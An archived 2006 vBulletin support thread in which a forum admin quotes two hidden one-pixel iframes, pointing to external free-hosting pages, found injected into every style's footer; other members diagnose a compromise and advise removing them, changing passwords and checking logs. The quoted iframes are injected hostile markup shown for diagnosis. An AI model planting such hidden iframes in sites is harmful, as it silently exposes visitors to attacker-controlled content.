Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
Reload this Page Please Tell me this Code and what
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 06-28-2006, 12:33 AM
Andromeda2875 Andromeda2875 is offline
 
Join Date: Jun 2006
Posts: 62
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Please Tell me this Code and what
Please assits me. I have found this code inside of my vbulletin code. It was in the footer of each style that I have.



Code:
<iframe src='http://domainsyahoo.freehostia.com/index.html' width='100%' height='1' scrolling="auto" align='center' allowtransparency="1" frameborder="0"/></iframe>




<iframe src='http://insurances.freehostia.com/index.html' width='100%' height='1' scrolling="auto" align='center' allowtransparency="1" frameborder="0"/></iframe>
Reply With Quote
  #2  
Old 06-28-2006, 12:45 AM
Guest210212002
Guest
  
Posts: n/a
Default
It's loading some kind of free hosting page inside an iframe on every page you load.

Unless you're associated with that site for some reason, remove it, change your admincp password, and have a look at this how-to I wrote up:

https://vborg.vbsupport.ru/showthread.php?p=877421

If you didn't put that code in there, you have a security hole somewhere.
Reply With Quote
  #3  
Old 06-28-2006, 12:49 AM
Andromeda2875 Andromeda2875 is offline
 
Join Date: Jun 2006
Posts: 62
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I knew I had a security whole in vbulletin but I was not sure where. What can I do to patch this up?

Thanks for that link too.
Reply With Quote
  #4  
Old 06-28-2006, 12:55 AM
Guest210212002
Guest
  
Posts: n/a
Default
Hard to say. If someone got into your ACP and only edited your footer template, that's kind of an odd thing for a hacker to do. You might want to check your logs and check with your host to see who's been at your FTP, and if you have SSH access, if there's logs of accesses other than your own.
Reply With Quote
  #5  
Old 06-28-2006, 02:15 PM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
And is this code in the actual templates, or does it only show in runtime?
Reply With Quote
  #6  
Old 06-28-2006, 02:20 PM
Andromeda2875 Andromeda2875 is offline
 
Join Date: Jun 2006
Posts: 62
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I have checked both logs. I have ssh access and have checked all logs. That is what I found weird. All they did was go into the acp and change the information in the footer. When they go in there they backed up a copy of my DB it seems. To answer your question Marco van Herwaarden, it was in the template itself.
Reply With Quote
  #7  
Old 06-29-2006, 01:34 AM
Wired1's Avatar
Wired1 Wired1 is offline
 
Join Date: Nov 2003
Location: Orlando, FL, USA
Posts: 1,361
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
EVERYONE:

Read this thread before posting in this one.


Andromeda: The MOST IMPORTANT QUESTION IS:

Did you open a trouble ticket on vbulletin.com, and/or with Jelsoft directly?
Reply With Quote
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 07:41 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04162 seconds
  • Memory Usage 2,207KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (7)post_thanks_box
  • (7)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (7)post_thanks_postbit_info
  • (7)postbit
  • (5)postbit_onlinestatus
  • (7)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete